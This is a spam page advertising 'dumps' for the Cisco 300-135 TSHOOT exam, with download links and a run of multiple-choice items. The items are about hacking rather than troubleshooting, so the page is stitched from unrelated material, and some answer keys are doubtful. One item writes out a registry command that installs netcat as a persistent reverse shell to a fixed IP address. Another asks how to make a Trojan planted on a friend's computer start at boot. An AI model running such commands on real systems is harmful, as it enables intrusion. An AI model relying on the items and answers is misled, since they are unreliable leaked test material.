[2017 Oct. New] Discount Cisco 300-135 Dumps Tshoot Study Guide Download With High Quality Youtube Training

For those that passed the Cisco 300-135 dumps what was the format? “Troubleshooting and Maintaining Cisco IP Networks” is the name of Cisco 300-135 exam dumps which covers all the knowledge points of the real Cisco exam. Discount Cisco 300-135 dumps Tshoot study guide download with high quality youtube training. Pass4itsure Cisco 300-135 dumps exam questions answers are updated (118 Q&As) are verified by experts.

The associated certifications of 300-135 dumps is CCNP Routing and Switching. In this competitive Troubleshooting and Maintaining Cisco IP Networks (TSHOOT) exam environment, everyone is struggling hard to achieve maximum skills and knowledge in Cisco https://www.pass4itsure.com/300-135.html dumps practice test to surpass others in qualities and skills.

Exam Code: 300-135
Exam Name: Troubleshooting and Maintaining Cisco IP Networks
Q&As: 118

[2017 Oct. New Cisco 300-135 Dumps From Google Drive]:https://drive.google.com/open?id=0BwxjZr-ZDwwWVjNzVmpXTDBzU00

[2017 Oct. New Cisco 210-260 Dumps From Google Drive]:https://drive.google.com/open?id=0BwxjZr-ZDwwWU0xad3NvRWR4Qzg

300-135 dumps

Following Cisco 300-135 Dumps 118QAs are all new published by Pass4itsure:

QUESTION NO: 50
You work as a Network Administrator for Net Perfect Inc. The company has a Windows-based
network. The company wants to fix potential vulnerabilities existing on the tested systems. You
use Nessus as a vulnerability scanning program to fix the vulnerabilities. Which of the following

vulnerabilities can be fixed using Nessus?
Each correct answer represents a complete solution. Choose all that apply.
A. Misconfiguration (e.g. open mail relay, missing patches, etc.)
B. Vulnerabilities that allow a remote cracker to control sensitive data on a system
C. Vulnerabilities that allow a remote cracker to access sensitive data on a system
D. Vulnerabilities that help in Code injection attacks
300-135 exam Answer: A,B,C
Explanation:
QUESTION NO: 51
Which of the following statements are true about firewalking?
Each correct answer represents a complete solution. Choose all that apply.
A. To use firewalking, the attacker needs the IP address of the last known gateway before the
firewall and the IP address of a host located behind the firewall.
B. In this technique, an attacker sends a crafted packet with a TTL value that is set to expire one
hop past the firewall.
C. A malicious attacker can use firewalking to determine the types of ports/protocols that can
bypass the firewall.
D. Firewalking works on the UDP packets.
Answer: A,B,C
Explanation:
QUESTION NO: 52
You run the following command on the remote Windows server 2003 computer:
c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d
“c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exe”
What task do you want to perform by running this command?
Each correct answer represents a complete solution. Choose all that apply.
A. You want to perform banner grabbing.
B. You want to set the Netcat to execute command any time.
C. You want to put Netcat in the stealth mode.
D. You want to add the Netcat command to the Windows registry.
300-135 dumps Answer: B,C,D
Explanation:
QUESTION NO: 53
You have inserted a Trojan on your friend’s computer and you want to put it in the startup so that
whenever the computer reboots the Trojan will start to run on the startup. Which of the following
registry entries will you edit to accomplish the task?
A. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Startup
B. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Auto
C. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
D. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Start
Answer: C
Explanation:
QUESTION NO: 54
Which of the following is the best method of accurately identifying the services running on a victim
host?
A. Use of the manual method of telnet to each of the open ports.
B. Use of a port scanner to scan each port to confirm the services running.
C. Use of hit and trial method to guess the services and ports of the victim host.
D. Use of a vulnerability scanner to try to probe each port to verify which service is running.
300-135 pdf Answer: A
Explanation:
QUESTION NO: 55
Jason, a Malicious Hacker, is a student of Baker university. He wants to perform remote hacking
on the server of DataSoft Inc. to hone his hacking skills. The company has a Windows-based
network. Jason successfully enters the target system remotely by using the advantage of
vulnerability. He places a Trojan to maintain future access and then disconnects the remote
session. The employees of the company complain to Mark, who works as a Professional Ethical
Hacker for DataSoft Inc., that some computers are very slow. Mark diagnoses the network and
finds that some irrelevant log files and signs of Trojans are present on the computers. He suspects
that a malicious hacker has accessed the network. Mark takes the help from Forensic
Investigators and catches Jason.
Which of the following mistakes made by Jason helped the Forensic Investigators catch him?
A. Jason did not perform a vulnerability assessment.
B. Jason did not perform OS fingerprinting.
C. Jason did not perform foot printing.
D. Jason did not perform covering tracks.
E. Jason did not perform port scanning.
Answer: D
Explanation:
QUESTION NO: 56
Which of the following functions can be used as a countermeasure to a Shell Injection attack?
Each correct answer represents a complete solution. Choose all that apply.
A. escapeshellarg()
B. mysql_real_escape_string()
C. regenerateid()
D. escapeshellcmd()
300-135 vce Answer: A,D
Explanation:
QUESTION NO: 57
Which of the following Nmap commands is used to perform a UDP port scan?
A. nmap -sY
B. nmap -sS
C. nmap -sN
D. nmap -sU
Answer: D
Explanation:
QUESTION NO: 58
You are responsible for security at a company that uses a lot of Web applications. You are most
concerned about flaws in those applications allowing some attacker to get into your network. What
method would be best for finding such flaws?
A. Manual penetration testing
B. Code review
C. Automated penetration testing
D. Vulnerability scanning
300-135 exam Answer: D
Explanation:
QUESTION NO: 59
Your company has been hired to provide consultancy, development, and integration services for a
company named Brainbridge International. You have prepared a case study to plan the upgrade
for the company. Based on the case study, which of the following steps will you suggest for
configuring WebStore1?
Each correct answer represents a part of the solution. Choose two.
A. Customize IIS 6.0 to display a legal warning page on the generation of the 404.2 and 404.3
errors.
B. Move the WebStore1 server to the internal network.
C. Configure IIS 6.0 on WebStore1 to scan the URL for known buffer overflow attacks.
D. Move the computer account of WebStore1 to the Remote organizational unit (OU).
300-135 dumps Answer: A,C
Explanation:
QUESTION NO: 60
Which of the following characters will you use to check whether an application is vulnerable to an
SQL injection attack?
A. Dash (-)
B. Double quote (“)
C. Single quote (‘)
D. Semi colon (;)
Answer: C
Explanation:

For this Cisco Troubleshooting and Maintaining Cisco IP Networks (TSHOOT) exam upgrading the qualification and skills are necessary. Even Cisco certified professionals require upgrading themselves. Now the 300-135 dumps new questions arises how to go through Cisco 300-135 certification. The https://www.pass4itsure.com/300-135.html dumps answer is so simple do preparation for Troubleshooting and Maintaining Cisco IP Networks (TSHOOT) exam.

Read More Youtube:https://youtu.be/K2S9iwgc3BY